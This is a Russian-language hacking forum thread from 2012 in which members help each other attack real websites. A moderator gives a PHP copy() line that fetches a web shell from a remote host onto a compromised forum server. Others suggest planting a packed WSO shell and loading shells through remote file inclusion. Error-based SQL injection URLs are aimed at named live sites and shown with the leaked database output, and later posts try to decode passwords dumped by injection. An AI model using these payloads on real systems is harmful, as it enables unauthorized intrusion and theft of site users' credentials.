Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    вот, залить могу что угодно
     
    _________________________
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    я к тому что откуда ты эту инфу берешь, у тебя евал там?
     
    _________________________
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    админка вб, выполнение пхп кода через модули
     
    _________________________
  4. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    ну так заливай, в чем проблема, я тебя понять не могу...
    если ты о том как заливать, то один из вариантов

    copy('http://site.ru/shell.txt','/papka/s/npoBaMu/Ha/3anucb/6e3naleBashell.php');

    если ты о том что за папка с правами на запись, то найди в пхпхинфо DOCUMENT_ROOT там будет путь к site.ru если у тебя форум в папке site.ru/forum/ то припишешь к этому пути /forum/ ну а там уже сам думай в какую папку лить, ищи которая на запись доступна
     
    _________________________
    #19304 HAXTA4OK, 7 Feb 2012
    Last edited: 7 Feb 2012
  5. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Лучше сразу код пакованного WSO вставь. Дальше спокойно посмотришь, где доступно для записи, где нет и зальеш в уютное местечко =)
     
  6. james00x

    james00x New Member

    Joined:
    6 Feb 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Я делаю все правильно? Потому что я нашел еще 2 сервера. Другие версии других операционных систем, но ничего не меняется. Но exploit показано, что ходить в их версии.
    Заранее спасибо.
     
    #19306 james00x, 7 Feb 2012
    Last edited: 7 Feb 2012
  7. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    ребят, подскажите где можна почитать про уязвимость в поле search?
     
  8. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    поле 'search' ничем не отличается от 'уязвимости' id. Это просто мегап****ц вопрос. Никогда в этой теме так никому не говорил, но тут порвало шаблон. НАПИШИ КАКОЕ-НИТЬ подобие сайта из двух страниц и базы, чтобы не задавать таких вопросов.
     
    #19308 Melfis, 8 Feb 2012
    Last edited: 8 Feb 2012
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    разве это новая категория уязвимостей? :)

    чаще всего там бывает xss или sqli, sqli из за недостаточной фильтрации входящих данных, которые используются вместе с оператором LIKE


    Melfis +1
     
    _________________________
  10. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    подскажите, при RFI подставляю http://ya.ru/ все норм, грузится яшка, далее подставляю http://site.ru/shell.txt - пустая страница в сорце весь код есть, http://site.ru/shell.php - открывает шелл на моем сайте, что еще можно попробывать??

    p.s. когда подгружаю с http://files.xakep.biz/shells/PHP/ одни крокозяблы
    при добавлении ? в конец адреса - пустая страница
     
    #19310 pirat0, 8 Feb 2012
    Last edited: 8 Feb 2012
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Может просто ифрейм?
     
  12. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    что можете сказать или лучше посоветовать?
    Code:
    _ww.9_months.ru/vote/24'
    Спасибо.
     
  13. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Ссылку нормально дай.
     
  14. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    вот версию вывел а дальше хз.
    http://www.9months.ru/vote/25-1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'
    нужна помощь великих и могучих))
    Code:
    Duplicate column name '5.0.86-log'
    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/9months/data/www/9months.ru/vote.php on line 195
    нет такого опроса
     
  15. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Немогу вывести инфу через контактацию с ошибком, помогите составить запрос
     
  16. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    гы, я тоже с этим сайтом в прошлом парился)))
    вот
    http://www.dunloptyres.ru/tyre.php?id=3+and(select+count(*)+from+information_schema.tables+group+by(concat(version(),0x00,floor(rand(0)*2))))--+
    Code:
    AND b.id=a.tyre_type_id [nativecode=1062 ** Duplicate entry '5.0.87-community' for key 1]
    Array
     
    1 person likes this.
  17. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    106
    Likes Received:
    26
    Reputations:
    5
    Достаю пассы через скулю с БД, но проблема с кодировкой
    пассы на кирилице выглядят дdЭеѓj(¤хW nжnѓ»
    как бороться ?
     
  18. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    106
    Likes Received:
    26
    Reputations:
    5
    точнее это не с кодировкой проблемы это так пасы шифруються .
    Вот пример нескольких паролей
    У всех по 16 символов , но что это такое ? есть у кого идеи каким макаром оно зашифоровано?
     
  19. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    ascii, hex
     
    _________________________
  20. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    106
    Likes Received:
    26
    Reputations:
    5
    16 символов навело на мысль что это sql хеш , но че он в таком странном виде?
    Подскажите кто нибудь хоть что-то плз .
     
Thread Status:
Not open for further replies.